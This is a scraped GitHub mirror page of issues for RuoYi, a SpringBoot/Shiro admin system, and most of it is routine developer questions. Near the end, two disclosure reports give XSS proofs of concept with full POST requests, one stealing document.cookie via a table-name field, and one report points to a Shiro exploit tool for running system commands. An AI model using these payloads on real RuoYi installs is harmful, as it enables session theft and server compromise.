lerry903 / ruoyi Goto Github PK
View Code? Open in Web Editor NEW基于SpringBoot2.1的权限管理系统 易读易懂、界面简洁美观。 核心技术采用Spring、MyBatis、Shiro没有任何其它重度依赖。直接运行即可用
Home Page: http://www.ruoyi.vip
License: Apache License 2.0
基于SpringBoot2.1的权限管理系统 易读易懂、界面简洁美观。 核心技术采用Spring、MyBatis、Shiro没有任何其它重度依赖。直接运行即可用
Home Page: http://www.ruoyi.vip
License: Apache License 2.0
排序工具类isAsc初值未设置成功
前端项目在哪里,文档里没看到
目前出现的情况是remark一旦加上@Excel就会出现列名位于EXCEL的第一列,求大神赐教学习
博主的后端服务是否支持跨域访问呢?
二级菜单点击失效,我搞了一晚上了,求助!!!
我在项目里写了一个商城公共头,并没有使用后台的东西,后台也没有引用我的东西。
这些都不是关键,关键是我按照代码规范写了一个api,
import { getShopUserInfo, getAllCount } from '@/api/shopCommon'
这样导入之后代码可以运行,没有报错,也能从后台拿到数据。
但是这行代码却影响到了后台的二级菜单,点击失效。
一级菜单却没有失效,点击可以显示内容。
我百思不得其解,路由从头看了个遍,也没有看出个头头来。
详细代码如下 略有删减,以便检查
import { userInfo, allCount } from '@/api/shop/common'
export default {
name: 'GlobalHeader',
methods: {
async getUserInfo () {
await userInfo().then(res => {
const location = res.data.loginIp
const name = res.data.userName
const depart = res.data.deptName
this.location = location
this.name = name
this.depart = depart
})
},
async refreshAllCount () {
await allCount().then(res=>{
const myselectCount = res.data.myselectCount
const myRecomCount = res.data.myRecomCount
const myOrderFormCount = res.data.myOrderFormCount
const mySubscribeCount = res.data.mySubscribeCount
this.myselectCount = myselectCount
this.myRecomCount = myRecomCount
this.myOrderFormCount = myOrderFormCount
this.mySubscribeCount = mySubscribeCount
})
}
}
}
import GlobalHeader from './GlobalHeader'
export default GlobalHeader
import { shopAxios } from '@/utils/request'
const api = {
userInfo:"/shop/index/loginUserInfo",
allCount:'/shop/index/allCount'
}
export function userInfo(){
return shopAxios({
url:api.userInfo,
method:'get'
})
}
export function allCount(){
return shopAxios({
url:api.allCount,
method:'get'
})
}
版本库地址:待...
我们开发环境和测试环境用的数据库是一起的,但是开发环境的定时器有时候会和测试环境的定时器一起运行,导致出现一些问题,通过百度搜索,用scheduling.enabled=false配置在配置文件上也是没有生效的,有没有什么好的办法解决多环境定时器共同运行的问题
eu.bitwalker.UserAgentUtils
建议溢出不可信的第三方jar,未经过实践的jar包总是会出现各种问题。
ry-ui.js?v=4.0.0:1027 Uncaught TypeError: Cannot read property 'contentWindow' of undefined
at Object.successTabCallback (ry-ui.js?v=4.0.0:1027)
at Object.success (ry-ui.js?v=4.0.0:968)
at j (jquery.min.js:2)
at Object.fireWith [as resolveWith] (jquery.min.js:2)
at x (jquery.min.js:4)
at XMLHttpRequest. (jquery.min.js:4)
The cause of the vulnerability
The project uses shiro1.7.0 version, this version should not have this vulnerability;
Code layer troubleshooting:
Exploit:
You can use the following tools to exploit this vulnerability, Github project: https://github.com/j1anFen/shiro_attack
Execute system commands
在二级路由页面有一个点击查看详情进入三级路由界面,如何添加路由,并且不在侧边导航栏上显示,且面包屑会记录上一级路由
function queryUserList() {
var options = {
url: prefix + "/list",
createUrl: prefix + "/add",
updateUrl: prefix + "/edit/{id}",
removeUrl: prefix + "/remove",
exportUrl: prefix + "/export",
modalName: "监控-字典对应",
showExport: false,
pagination: false,
sortName: 'srot',
sortOrder: 'asc',
striped: true,
showRefresh: false,
uniqueId:"id",
//onDblClickCell: onDblClickCell,
onDblClickCell: onDblClickCell,
columns: [{
checkbox: false
},
{
field : 'id',
title : '',
visible: false
},
{
field : 'xmmc',
title : '项目名称',
sortable: true
},
{
field : 'xmbm',
title : '项目编码',
sortable: true
},
{
field : 'zdmc',
title : '字段名称',
sortable: true
},
{
field : 'zdbm',
title : '字典编码',
sortable: true
},
{
field : 'dyzdmc',
title : '对应字段名称',
sortable: true
},
{
field : 'dyzdbm',
title : '对应字段编码',
sortable: true
},
{
title: '操作',
align: 'center',
formatter: function(value, row, index) {
var actions = [];
// actions.push('<a class="btn btn-success btn-xs ' + editFlag + '" href="javascript:void(0)" onclick="$.operate.edit(\'' + row.id + '\')"><i class="fa fa-edit"></i>编辑</a> ');
// actions.push('<a class="btn btn-danger btn-xs ' + removeFlag + '" href="javascript:void(0)" onclick="$.operate.remove(\'' + row.id + '\')"><i class="fa fa-remove"></i>删除</a>');
var aStr1 = "<a onclick='syncClick(" + index + "," + row.id +")'><i class=\"fa fa-edit\"></i>同步</a> ";
var aStr = "<a onclick='addDy(" + index + "," + row.id +")'>新增对应关系</a> ";
var aStr2="";
if(row.sfxzdygx!='1'){
var aStr2 = "<a onclick='del(" + index + "," + row.id +")' shiro:hasPermission=\"system:tEhrJkZddy:remove\">删除</a>"
}
//actions.push('<a onclick="addDy(\'' + tEhrJkMain, '\' + \'' + row.id + '\')">新增对应关系</a>')
actions.push(aStr1);
actions.push(aStr);
actions.push(aStr2);
return actions.join('');
}
}
]
};
$.table.init(options);
}
function onDblClickCell(field, value, row, $element){
$.operate.edit(row.id);
}
/**
* @param {点击列的 field 名称} field
* @param {点击列的 value 值} value
* @param {点击列的整行数据} row
* @param {td 元素} $element
*/
function onDblClickCell(field, value, row, $element) {
if(field == 'dyzdmc' || field == 'dyzdbm') {
$element.attr('contenteditable', true);
$element.blur(function () {
var index = $element.parent().data('index');
var tdValue = $element.html();
saveData(index, field, tdValue, row);
})
}else{
$.modal.alertError('只能修改对应字段名称和对应字段编码');
}
}
在使用多线程的过程中,偶尔会出现报错:
org.apache.shiro.session.UnknownSessionException: There is no session with id [800e3201-637e-4c7b-988a-b73dc7b13d4b]
用户其他功能是正常使用的,维度多线程时错误。
ShiroConfig 类是否设置shiro session的cookie 名
After the administrator logged in, open the following page
system management->Notice notice
Then add the following XSS statement to the announcement title
poc: ”><sCript>alert
xss</SCript>
there is post package:
POST /system/notice/edit HTTP/1.1
Host: localhost
Content-Length: 219
sec-ch-ua: "Chromium";v="89", ";Not A Brand";v="99"
Accept: application/json, text/javascript, /; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/system/notice/edit/10
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=0dc0e965-0a6a-4e08-bb4e-0e4b600be71f
Connection: close
After the administrator logged in, open the following page
System tools->code generation
Then click Import, select any one and click OK. Then click Edit, click basic information, and enter the following XSS statement in the column of table name
poc2:')" onmousemove=alert(document.cookie) a=(1
there is post package:
POST /tool/gen/edit HTTP/1.1
Host: localhost
Content-Length: 3880
sec-ch-ua: "Chromium";v="89", ";Not A Brand";v="99"
Accept: application/json, text/javascript, /; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/tool/gen/edit/1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=0dc0e965-0a6a-4e08-bb4e-0e4b600be71f
Connection: close
tableId=1&tableName=')%22+onmousemove%3Dalert(document.cookie)+a%3D(1&tableComment=%E9%80%9A%E7%9F%A5%E5%85%AC%E5%91%8A%E8%A1%A8&className=SysNotice&functionAuthor=ruoyi&remark=&columns%5B0%5D.columnId=1&columns%5B0%5D.sort=1&columns%5B0%5D.columnComment=%E5%85%AC%E5%91%8AID&columns%5B0%5D.javaType=Integer&columns%5B0%5D.javaField=noticeId&columns%5B0%5D.isInsert=1&columns%5B0%5D.queryType=EQ&columns%5B0%5D.htmlType=input&columns%5B0%5D.dictType=&columns%5B1%5D.columnId=2&columns%5B1%5D.sort=2&columns%5B1%5D.columnComment=%E5%85%AC%E5%91%8A%E6%A0%87%E9%A2%98&columns%5B1%5D.javaType=String&columns%5B1%5D.javaField=noticeTitle&columns%5B1%5D.isInsert=1&columns%5B1%5D.isEdit=1&columns%5B1%5D.isList=1&columns%5B1%5D.isQuery=1&columns%5B1%5D.queryType=EQ&columns%5B1%5D.isRequired=1&columns%5B1%5D.htmlType=input&columns%5B1%5D.dictType=&columns%5B2%5D.columnId=3&columns%5B2%5D.sort=3&columns%5B2%5D.columnComment=%E5%85%AC%E5%91%8A%E7%B1%BB%E5%9E%8B%EF%BC%881%E9%80%9A%E7%9F%A5+2%E5%85%AC%E5%91%8A%EF%BC%89&columns%5B2%5D.javaType=String&columns%5B2%5D.javaField=noticeType&columns%5B2%5D.isInsert=1&columns%5B2%5D.isEdit=1&columns%5B2%5D.isList=1&columns%5B2%5D.isQuery=1&columns%5B2%5D.queryType=EQ&columns%5B2%5D.isRequired=1&columns%5B2%5D.htmlType=select&columns%5B2%5D.dictType=&columns%5B3%5D.columnId=4&columns%5B3%5D.sort=4&columns%5B3%5D.columnComment=%E5%85%AC%E5%91%8A%E5%86%85%E5%AE%B9&columns%5B3%5D.javaType=String&columns%5B3%5D.javaField=noticeContent&columns%5B3%5D.isInsert=1&columns%5B3%5D.isEdit=1&columns%5B3%5D.isList=1&columns%5B3%5D.isQuery=1&columns%5B3%5D.queryType=EQ&columns%5B3%5D.htmlType=summernote&columns%5B3%5D.dictType=&columns%5B4%5D.columnId=5&columns%5B4%5D.sort=5&columns%5B4%5D.columnComment=%E5%85%AC%E5%91%8A%E7%8A%B6%E6%80%81%EF%BC%880%E6%AD%A3%E5%B8%B8+1%E5%85%B3%E9%97%AD%EF%BC%89&columns%5B4%5D.javaType=String&columns%5B4%5D.javaField=status&columns%5B4%5D.isInsert=1&columns%5B4%5D.isEdit=1&columns%5B4%5D.isList=1&columns%5B4%5D.isQuery=1&columns%5B4%5D.queryType=EQ&columns%5B4%5D.htmlType=radio&columns%5B4%5D.dictType=&columns%5B5%5D.columnId=6&columns%5B5%5D.sort=6&columns%5B5%5D.columnComment=%E5%88%9B%E5%BB%BA%E8%80%85&columns%5B5%5D.javaType=String&columns%5B5%5D.javaField=createBy&columns%5B5%5D.isInsert=1&columns%5B5%5D.queryType=EQ&columns%5B5%5D.htmlType=input&columns%5B5%5D.dictType=&columns%5B6%5D.columnId=7&columns%5B6%5D.sort=7&columns%5B6%5D.columnComment=%E5%88%9B%E5%BB%BA%E6%97%B6%E9%97%B4&columns%5B6%5D.javaType=Date&columns%5B6%5D.javaField=createTime&columns%5B6%5D.isInsert=1&columns%5B6%5D.queryType=EQ&columns%5B6%5D.htmlType=datetime&columns%5B6%5D.dictType=&columns%5B7%5D.columnId=8&columns%5B7%5D.sort=8&columns%5B7%5D.columnComment=%E6%9B%B4%E6%96%B0%E8%80%85&columns%5B7%5D.javaType=String&columns%5B7%5D.javaField=updateBy&columns%5B7%5D.isInsert=1&columns%5B7%5D.isEdit=1&columns%5B7%5D.queryType=EQ&columns%5B7%5D.htmlType=input&columns%5B7%5D.dictType=&columns%5B8%5D.columnId=9&columns%5B8%5D.sort=9&columns%5B8%5D.columnComment=%E6%9B%B4%E6%96%B0%E6%97%B6%E9%97%B4&columns%5B8%5D.javaType=Date&columns%5B8%5D.javaField=updateTime&columns%5B8%5D.isInsert=1&columns%5B8%5D.isEdit=1&columns%5B8%5D.queryType=EQ&columns%5B8%5D.htmlType=datetime&columns%5B8%5D.dictType=&columns%5B9%5D.columnId=10&columns%5B9%5D.sort=10&columns%5B9%5D.columnComment=%E5%A4%87%E6%B3%A8&columns%5B9%5D.javaType=String&columns%5B9%5D.javaField=remark&columns%5B9%5D.isInsert=1&columns%5B9%5D.isEdit=1&columns%5B9%5D.isList=1&columns%5B9%5D.queryType=EQ&columns%5B9%5D.htmlType=input&columns%5B9%5D.dictType=&tplCategory=crud&packageName=com.ruoyi.system&moduleName=system&businessName=notice&functionName=%E9%80%9A%E7%9F%A5%E5%85%AC%E5%91%8A¶ms%5BparentMenuId%5D=¶ms%5BparentMenuName%5D=&genType=0&genPath=%2F&subTableName=¶ms%5BtreeCode%5D=¶ms%5BtreeParentCode%5D=¶ms%5BtreeName%5D=
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.